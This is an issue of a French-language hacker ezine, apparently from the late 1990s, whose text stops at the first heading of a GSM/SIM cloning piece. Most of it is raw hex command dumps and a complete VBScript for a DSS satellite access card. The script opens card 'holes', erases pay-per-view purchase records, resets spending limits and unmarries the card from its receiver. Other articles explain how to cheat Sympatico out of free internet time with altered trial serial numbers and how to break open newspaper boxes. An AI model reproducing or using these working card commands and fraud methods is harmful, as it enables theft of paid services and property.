00 14 90 00 26 91 00 14 91 00 26 90 00 14 F0 00
14 FE 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 24
R01
09 24 00 00 30 4E 00 5C 2F EA 56 0D 00 00 01 00
66 00 01 FD E9 1B 59 00 00 40 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 78 9F DE C0 41 33 77 9F DE
C0 41 33 76 9F DE C0 41 33 75 9F DE C0 41 33 96
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 31
R01
09 24 00 00 30 41 36 B0 9F DE C0 41 3E 80 9F DE
C0 41 3A 98 9F DE C0 56 0D 01 00 02 00 66 00 01
FD E9 FF FE 00 00 40 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 7C 9F DE C0 41 33 7A 9F DE
C0 41 33 8F 9F DE C0 41 33 3F 9F DE C0 41 33 56
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 9B 9F DE C0 41 33 46 9F DE
C0 41 33 95 9F DE C0 41 33 9A 9F DE C0 41 34 6E
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 34 9D 9F DE C0 41 33 A0 9F DE
C0 41 33 E7 9F DE C0 41 33 E8 9F DE C0 41 33 7D
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
r01
09 24 00 00 30 41 34 9E 9F DE C0 41 34 9D 9F DE
C0 41 34 72 9F DE C0 41 33 42 9F DE C0 41 33 89
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 82 9F DE C0 41 34 47 9F DE
C0 41 33 84 9F DE C0 41 33 99 9F DE C0 41 34 71
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 34 71 9F DE C0 41 33 85 9F DE
C0 41 34 AD 9F DE C0 41 33 E9 9F DE C0 41 33 80
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R0248 42 00 00 2D
R01
09 24 00 00 30 41 34 49 9F DE C0 41 33 7E 9F DE
C0 41 33 7F 9F DE C0 41 33 81 9F DE C0 41 33 7B
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 4C 00 00 09
R01
00 00 00 00 01 52 09 95 00
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 01 82 FC 11 56 63 88
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 02 8F F1 79 81 1C EC
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 03 8F F5 FA 24 FD 02
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 04 8F F9 86 79 FF FF
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 05 84 F8 00 02 1C C1
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 06 85 88 FC 91 F9 90
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 07 86 70 02 8F F1 84
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1E
R01
09 12 00 00 30 60 C0 0A 00 08 84 60 A8 76 B8 E8
00 22 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 40 00 00 1E
R01
09 12 00 00 30 60 C0 0A 00 09 86 05 84 91 60 30
5F 05 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0A 8F 3B 48 03 85 4C
4F B4 57 5A 80 FE AF 31 BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0B 8F 2F FF 09 E5 28
54 80 12 13 48 74 09 B4 BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0C 8F 47 63 07 60 22
F5 50 02 05 F9 30 51 03 BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0D 8F 53 85 4F 4C 53
32 1F C2 70 7D FF 02 8B BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 06 00 0E 8B F8 F1 45 C0 05
00 0E 8F 5F 92 BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 05 00 0F 86 6D 41 C0 06 00
0F 89 65 F1 4B BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 1E
R01
09 12 00 00 30 60 C0 0A 00 10 8B A5 E5 50 70 FE
F1 50 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 0D 00 11 8F 60 E5 4E 24 FE
54 0C 02 86 60 BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 1D
R01
09 12 00 00 30 60 C0 09 00 12 86 5C 02 8F 60 22
60 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 20
R01
09 12 00 00 30 60 C0 05 00 13 82 93 02 C0 05 00
13 82 97 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 20
R01
09 12 00 00 30 60 C0 05 00 14 82 AB 00 C0 05 00
14 8F 44 61 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 15 85 8B ED B4 AA 00
40 18 80 0C BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 0D 00 16 8F 70 E5 4C 24 41
40 33 02 15 BF BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 1F
R01
09 12 00 00 30 60 C0 0B 00 17 8F 79 E7 54 3F F7
02 87 81 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1A
R01
09 12 00 00 30 60 C0 06 00 18 85 D0 8F 79 BB 00
09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 19 85 91 90 0C 98 84
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 19
r01
09 12 00 00 30 60 C0 05 00 1A 8F 2F 09 BB 00 09
10 00 00 0C 71 3C 6B 7D FF
R02
;------ a ici

Maintenant la carte est active! youpi!! ds que vous la metterez dans un receiver 
elle ne marchera que dans celui-ci et dans aucun autre!!
Bon maintenant je vous suggeres de fermer le hole 09.

48 40 00 00 19
r01
09 12 00 00 30 60 C0 05 00 1A 8F 2F 09 BB 00 09
10 00 00 0C 71 3C 6B 7D FF
R02

ok! Que la carte marche ou pas c'est pas mon problme. Une carte normal devrais 
marcher aprs tous ca! Si vous ne voyez aucune image mais avec toutes les postes, 
c'est parce qu'il y a eu avant sur votre carte, un 3m mal dsinstall(un 3m passe 
par dessus tout, il y a pas d'expiration et tu payas pas les film, c'est comme un 
decodeur pirate.) Alors, essayez d'aller dsinstaller votre 3m dans vortex! C'est 
pas mal le seul moyen mais bon je ferai un article a ce sujet dans le prochain numero!! 
ok? bon good de toute facon ya personne qui lis mes articles ;) ok maintenant vous 
voulez savoir comment toute ravoir votre cash dans les pay per view hein!! ok shootez 
simplement ce fichier si!!

48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 00 00 00 09 24 09
24 09 24 22 22 BB 00 0C 02 9C 62 95 FA
R02
48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 80 00 00 09 24 09
24 09 24 22 22 BB 00 0C 16 FC 5B 73 BF
R02
48 42 00 00 1C
R01
09 1A 00 00 30 60 D2 02 AC 00 C0 08 00 1B 85 14
01 8F 2F FF BB 00 0C D0 24 2F 61 D7
R02
48 40 00 00 1A
r01
09 22 00 00 30 60 c0 06 00 1C 85 d0 87 81 bb 00
09 10 00 00 0C 71 3C 6B 7D FF
r02
48 42 00 00 1C
R01
09 22 00 00 30 60 C0 08 00 1D 88 5E 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 22 00 00 30 60 C0 0c 00 1E 88 62 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 22 00 00 30 60 C0 0c 00 1F 88 6A 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1b
r01
60 d0 16 8e 84 06 d0 85 93 02 50 11 d5 85 dc 85
a7 85 00 00 00 00 00 00 ef bb 00
r02
48 40 00 00 1b
r01
60 d0 16 8e 83 D8 d0 85 93 02 50 11 d5 85 dc 85
a7 85 00 00 00 00 00 01 ef bb 00
r02
48 40 00 00 1b
r01
60 d0 16 8e 83 E4 d0 85 93 02 50 11 d5 85 dc 85
a7 85 00 00 00 00 00 01 ef bb 00
r02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 01 80 28 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 02 80 30 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 03 80 38 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 04 80 40 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 05 80 48 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
09 12 00 00 30 60 C0 0C 00 06 80 50 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 07 80 58 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 08 80 60 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 09 80 68 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0A 80 70 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0B 80 78 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0C 80 80 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0D 80 88 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0E 80 90 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0F 80 98 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 10 80 A0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 11 80 A8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 12 80 B0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 13 80 B8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 14 80 C0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 15 80 C8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 16 80 D0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 17 80 D8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 18 80 E0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 19 80 E8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 19
r01
09 12 00 00 30 60 C0 05 00 1A 8F 2F 09 BB 00 09
10 00 00 0C 71 3C 6B 7D FF
R02

Encore les 25 doubles line pour les 25 ppv dumb entk bon maintenant je peux vous 
montrez un fichier qui fait la meme chose et encore plus c'est un fichier qui va 
seulement marcher avec win explorer car il est script pour win explorer. Tout au 
long de son droulement il sera entirement customizable..... c'est cool hein!! 
Bon essaye ca.


;---------- ici
Option Explicit

Sub Main()
	Dim ErrorString
	Dim UpdateNumber
	
	If Sc.Version < 3.2 Then
		ErrorString = "You Need Version 3.2 or Greater of WinExplorer To Run This Script"
		Sc.MsgBox ErrorString, vbCritical
		Err.Raise 1050, , ErrorString
	End If

	If Sc.ByteDelay < 60000 Then
		Sc.ByteDelay = 60000
	End If


	If GetUSW() <> 26 Then
		ErrorString = "Your USW is not at 26(decimal), This Script is only for cards at 26 Updates"
		Sc.MsgBox ErrorString, vbCritical
		Err.Raise 1050, , ErrorString
	End If

	Call OpenHoles()
			
	Call CleanPPV()
	
	Sc.Print(vbCrLf & "Clear Purchase Amounts" & vbCrLf) 
	
	Sc.Write("48 40 00 00 0F")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 06 02 83 D8 00 01 00 BB 00")
    Sc.Read(&H2)

	
	Sc.Write("48 40 00 00 0F")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 06 02 83 E4 00 01 00 BB 00")
    Sc.Read(&H2)
	
	  
    Sc.Print(vbCrLf & "Setting Spending Limits" & vbCrLf)
    
	Sc.Write("48 42 00 00 24")
	Sc.Read(&H1)
	Sc.Write("09 24 00 00 30 4E 00 3C 2F EA")
	Sc.Write("56 0D 00 00 01 00 66 00 01")
	Sc.Write("FD E9") '($650.00) (hex value -1)cents
	Sc.Write("1B 59 00 00")
	Sc.Write("40 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)
	
	Sc.Write("48 42 00 00 24")
	Sc.Read(&H1)
	Sc.Write("09 24 00 00 30 4E 00 3C 2F EA")
	Sc.Write("56 0D 01 00 02 00 6B 00 01")
	Sc.Write("1D 4D") '($75.00) (hex value -1)cents
	Sc.Write("FF FE 00 00")
	Sc.Write("40 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)
	
    Sc.Print(vbCrLf & "Unmarry Receiver" & vbCrLf)
    
    Sc.Write("48 40 00 00 11")
    Sc.Read(&H1)
    Sc.Write("60 D5 02 85 8E E3 08 04 83 D0 00 00 00 00 00 BB 00")
    Sc.Read(&H2)
     	
	Call CloseHoles()
End Sub

'================================================================

Sub OpenHoles()
	
	Sc.Print(vbCrLf & "Open 09 and E3 Hole" & vbCrLf)
	Sc.Reset

	Sc.Write("48 42 00 00 1D")
	Sc.Read(&H1)
	Sc.Write("09 1A 00 00 30 60 C9 0D 00 01 00 00 00 09 24 09")
	Sc.Write("24 09 24 22 22 BB 00 0C 02 9C 62 95 FA")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1D")
	Sc.Read(&H1)
	Sc.Write("09 1A 00 00 30 60 C9 0D 00 01 80 00 00 09 24 09")
	Sc.Write("24 09 24 22 22 BB 00 0C 16 FC 5B 73 BF")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 1A 00 00 30 60 D2 02 AC 00 C0 08 00 1B 85 14")
	Sc.Write("01 8F 2F FF BB 00 0C D0 24 2F 61 D7")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 08 00 1C 88 5E 00 00 00 00")
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 08 00 1D 88 62 00 00 00 00")
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 08 00 1E 88 66 00 00 00 00")
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)
	
	Sc.Write("48 42 00 00 19")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 05 00 1F 85 91 80") 
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)

End Sub
'================================================================

Sub CloseHoles()
	Sc.Print(vbCrLf & "Closing Holes and Restoring USW to 26(decimal) updates" & vbCrLf)
	Sc.Reset
	
	Sc.Write("48 40 00 00 0F")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 06 02 84 06 00 1A 00 BB 00")
    Sc.Read(&H2)
 
	Sc.Write("48 40 00 00 0E")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 05 01 8F 2F 09 00 BB 00")
    Sc.Read(&H2)

	Sc.Write("48 40 00 00 11") 
	Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 08 04 85 91 90 0C 98 84 00 BB 00")
	Sc.Read(&H2)
End Sub
'================================================================

Sub CleanPPV()
	Dim OldState
	Dim ThisSlot
	Dim ThisByte
	Dim PpvInfo(74)
	Dim UpdateNumber
	Const StartAddress = &H8028		' Starting Memory Address to Clear

	Sc.Reset

	Sc.Print(vbCrLf & "Checking PPV Slots" & vbCr)
	UpdateNumber = GetUSW() + 1		' Next Update Number

	Oldstate = Sc.Verbose
	Sc.Verbose = False

	Sc.Write("48 5F 00 0E 4E")
	Sc.Read(1)
	Sc.Read(&H4D)
	Sc.Verbose = Oldstate

	For ThisByte = 0 To 74
		PpvInfo(ThisByte) = Sc.GetByte(ThisByte)	' Save a copy of the PPV info
	Next


	For ThisSlot = 0 To 24
		ThisByte = ThisSlot * 3
		If PpvInfo(ThisByte) Or PpvInfo(ThisByte + 1) Or (PpvInfo(ThisByte + 2) <> &H20) Then
			Sc.Print(vbCrLf & "Clearing PPV Slot #" & ThisSlot + 1 & vbCr)
			Sc.Write("48 42 00 00 20")
			Sc.Read(&H1)
			Sc.Write("09 12 00 00 30 60 C0 0C")
			Sc.Write(HexString(UpdateNumber, 4) & HexString((ThisSlot * 8) + StartAddress, 4))
			Sc.Write("00 00 00 00 00 00 00 00 BB 00")
			Sc.Write("09 10 00 00 0C 71 3C 6B 7D FF")
			Sc.Read(&H2)
			UpdateNumber = UpdateNumber + 1
		End If
	Next
End Sub
'================================================================

Function GetUSW()
	Dim Oldstate

	Sc.Reset

	Oldstate = Sc.Verbose
	Sc.Verbose = False

	Sc.Write("48 2B 00 00 80")
	Sc.Read(131)

	GetUSW =(Sc.GetByte(29) * &H100) + Sc.GetByte(30)

	Sc.Verbose = Oldstate
End Function
'================================================================

Function HexString(ThisNumber, Length)
	Dim RetVal
	Dim CurLen



	RetVal = Hex(ThisNumber)
	CurLen = Len(RetVal)
	
	If CurLen < Length Then
		RetVal = String(Length - CurLen, "0") & RetVal
	End If
		
	HexString = RetVal
End Function
'================================================================


Super comme fichier non?? entk y'ai super jai trouv ca quelque part sur le net, 
c'est bien cool!

Ok c'est pas mal tout, bon merci  la seule personne au monde qui aura lu mon article. 
Sans doute seulement parce que ce fut un mordu des ezines pis qui l'a lu pour le fun 
entk! J'ai pu vraiment rien d'autre  dire que Flicitation aux seuls personnes qui 
hack les satellites!! 

keep sat hack keep dss and read my article ;)) 
Comme d'habitude je ne suis pas responsable de toute ces merdes ;)
cya guy!!




 ___ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Free Internet Connection 
'.________ __ __ ___________ ____ __________ _______Par CyberRider __


Commme dans presque tous les numeros d'ezine ya toujours quelqu'un qui ecrit un 
article sur les connections internet gratosse!! mais la plus part parlent toujours 
de comment piquer l'acces  son chum ou a un trou de cul qu'on connait meme pas mais 
ici la super solution ultime qui vous offre d offrir votre compte internet totalement 
gratuitement* !!! 

Comment? c'est simple, suis ce qui suit!!!

* : Aucune attrape n'est comprise

Sans le savoir Sympatico nous offre des occasions illimits de pouvoir se denicher 
des 50 hrs gratuites par mois sans le savoir mais puisque je le publie dans un e-zine 
et quil y aura surement exageration ( comme dans tout) ce petit truc ne marchera 
surement pas trs trs longtemps.

Bon, le principe en ayant une trousse de sympatico de 50 hrs gratuite 
est que vous avez un petit collant qui vous donne un joli numero de serie pour obtenir 
une seule connection de 50 hrs!! Mais bon, un numero de srie ca se change par chez 
nous!!! ;)

Ok pour commencer tu te deniche une trousse de sympatico! 
C'est totalement gratuit tu appelles au service des membres au 1 888 279 6728 , la ya 
une tite bonne femme qui te repond et qui te dit : Oui c'est tu pour une commande de 
disquette (l elle te dit ca dans un accent d'anglais laid, on dirait qu'elle parle 
espagnol au lieu de francais!) Donc, l tu dit; stu veut to criss!!! Nenon sans joke, 
tu dis oui tu fait ce qui faut faire et c'est gratuit!!

Bon ensuite, passons  nos heures gratos de Sympatico!! hmmm!!

Le momment attendu wow... tu va voir ya rien de passionnant la dedans!
Quand tu installes le programme sympatico apres tu demarre le netscape ou autre browser, 
ensuite ca part plein de cochonerie pis ca dis comment t'enregistrer. Tu entres tes infos, 
l a entre sur le net et te demande ton # de serie et ton mode de paiement!! Tu dis par 
carte de edit alors tu dois donner ton vrai number de carte de credit mais je le jure a 
100% que c'est free !! 

Checkons le numero de serie maintenant!!! hmmmm 6390738378213434520 bon ce numero doit 
dj tre prit a l'heure qu'il est!!!

bon 6390738378213434520
       ^ 
       |--------------|
les numeros que tu peut changer!!!

Bon alors tu changes les numeros que tu veux dans le but de faire sauter
plusieurs acces, vous comprenez le principe? Admettons que tu marques 6390738378613636520 
a va marcher et t'a le net 50 hrs gratosse pendant 1 mois mais quand a te demande le prix 
apres le paiement metton tu marque 10 piasses!! mais une coupe de semaine aprs ton 
abonnement tu appelles  la centrale sympatico et tu dis que tu souhaites stopper ton 
abonnement  la fin du mois!! Et UP! aprs ce mois l, tu t'en fait un autre! 

Mais la j'en suis pas responsable, alors attention !!!!!


CyberRider


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
|                      Funny PHF Attempt :))))
'.________ __ __ ___________ ____ __________ ___ _______Par Endrix __


Attempt by ppp036.g002.cactuscom.com/207.253.190.36 to exploit phf has been logged. 


USE OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM CONSTITUTES
A CONSENT TO MONITORING AT ALL TIMES
THIS IS A DEPARTMENT OF DEFENSE (DOD) INTEREST COMPUTER SYSTEM.
ALL DOD INTEREST COMPUTER SYSTEMS AND RELATED EQUIPMENT ARE INTENDED
FOR THE COMMUNICATION, TRANSMISSION, PROCESSING, AND STORAGE OF
OFFICIAL U.S. GOVERNMENT OR OTHER AUTHORIZED INFORMATION ONLY.
ALL DOD INTEREST COMPUTER SYSTEMS ARE SUBJECT TO MONITORING AT ALL
TIMES TO ENSURE PROPER FUNCTIONING OF EQUIPMENT AND SYSTEMS INCLUDING
SECURITY DEVICES AND SYSTEMS, TO PREVENT UNAUTHORIZED USE AND
VIOLATIONS OF STATUTES AND SECURITY REGULATIONS, TO DETER CRIMINAL
ACTIVITY, AND FOR OTHER SIMILAR PURPOSES. ANY USER OF A DOD INTEREST
COMPUTER SYSTEM SHOULD BE AWARE THAT ANY INFORMATION PLACED IN THE
SYSTEM IS SUBJECT TO MONITORING AND IS NOT SUBJECT TO ANY EXPECTATION
OF PRIVACY.
IF MONITORING OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM
REVEALS POSSIBLE EVIDENCE OF VIOLATION OF CRIMINAL STATUTES, THIS
EVIDENCE AND ANY OTHER RELATED INFORMATION, INCLUDING IDENTIFICATION
INFORMATION ABOUT THE USER, MAY BE PROVIDED TO LAW ENFORCEMENT
PAGE 4 RUEJDCA0232 UNCLAS RELEASABLE TO NATO AS NATO UNCLAS
OFFICIALS. IF MONITORING OF THIS OR ANY OTHER DOD INTEREST COMPUTER
SYSTEM REVEALS VIOLATIONS OF SECURITY REGULATIONS OR UNAUTHORIZED
USE, EMPLOYEES WHO VIOLATE SECURITY REGULATIONS OR MAKE UNAUTHORIZED
USE OF DOD INTEREST COMPUTER SYSTEMS ARE SUBJECT TO APPROPRIATE
DISCIPLINARY ACTION.
USE OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM CONSTITUTES
A CONSENT TO MONITORING AT ALL TIMES


webadmin@ncts.navy.mil


------> hehe damn ;)

- endrix


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Divertissement gratuit :)
'.________ __ __ ___________ ____ ________ ______ ______Par Endrix __


-=-=-=-=-=-=-=-=-=-=-=-=-=
Lecture qui coute rien !!!
-=-=-=-=-=-=-=-=-=-=-=-=-=

Hey bien voil... Tout a commenc quand.......... {

Pendant la journe, j'avais pratiquement rien a faire alors j'ai
appeller des amis(es) et j'ai aprit qu'il y avait un party 
Gatineau ce mme soir. Nous avons dcider d'y aller !!! Bon, le
soir venu, mon chum vient me porter chez une amie et nous nous
sommes rencontrs la. Bon, il fallait se rendre aux Promenates
pour prendre un autobus qui allait nous menez jusqu'au party.
Nous marchons, Nous marchons, Nous marchons.... Ah j'ai faim,
alors nous nous sommes arrter au Burger King. J'aime bien ca
la bouffe qui font la mais ca l'air que mon ami ne va plus y
retourne parce qu'il a vu la femme entrain de faire le HamBurger
se pogn le cul et aprs mettre des tomates... C'est vraiment
dgeulasse non ??? En tk... Nous repartons... Arriv aux
Promenades, il fallait attendre 20 minutes criss au froid.. en
tk.. Bon, j'ai trouv quelque chose  faire !!! Un journal !!!!!
Mais, merde.. J'ai pas d'argent... grrrr... Un ami me dit : "Pas
besoin d'argent pour ca voyon... !! ". Je dit "ok ouin et
comment?" Et bien  ce moment, il tire la petite porte doucement
et la il commence  donner des petits coups dessus, juste en
haut ou il y a la barrure !!! Et la... CLICK !!! La portire
ouvre ;) Bon.. C'est pas un journal qui est bon.. Ahh !! Il y a
Le Droit ;) Hey bien bam, bam, bam pour le droit aussi!! hhh

Ca marche trs bien !! Essayez le et vous verez !!!

- endrix.(j'avais rien a faire)



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Systme GSM pour les Cel 
'.________ __ __ ___________ ____ ____________ _ __ ____SlasHerZ __


Lo, voici un ptit file sur les GSM, cette norme francaise de telephonie
cellulaire apparue en 1982. Ici ne sera relatee que la theorie du 
fonctionnement de la securite de ces cellphones.

( La plupart des SYSTEM de Scurit CELLULAIRE fonctionnent sous la meme base )

Intro
-----

Apres l'epoque des cells analogiques utilisant les systemes TACS et AMPS,
on a vu arriver sur le marche des nouveaux mobiles fonctionnant grace au 
systeme GSM (Groupe Special Mobile) dont la principale caracteristique est 
qu'ils utilisent un encryptage et un transfere de donnees numeriques.
Avec les cells analogiques, on pouvait facilement intercepter n'importe
kelle conversation avec un scanner et meme des infos interessantes comme
l'ESN et le MIN ki etaient necessaires pour cloner. La perte de profits
a ete estimee a 500 millions de $ aux States en 1993.
Le fonctionnement du systeme de securite des GSM fait de lui le moyen de 
telephonie cellulaire le plus sur de nos jours. C'est notament parcekil 
utilise plusieurs algo d'encrytage differents pour la voix, l'envoi des
data de l'abonnement (etc), et le TDMA (Time Division Multiple Access) ki
en gros envoie les data par packets codes.
Le phreaking de ces petites choses s'annonce donc difficile.
Deux possibilites :
1) Trouver les algos (Une partie d'un a deja ete diffusee sur le net)
2) Cloner les cartes SIM (Micro-controleur) avec le materiel adapte.
Sans aucun doute, la seconde est la meilleure des solutions :))
A ma connaissance, des clones ont deja ete realises par des mecs de la 
scene et par d'autre dans le milieu de l'elec. Donc c possible.


Parametres necessaires au fonctionnement du cell
------------------------------------------------

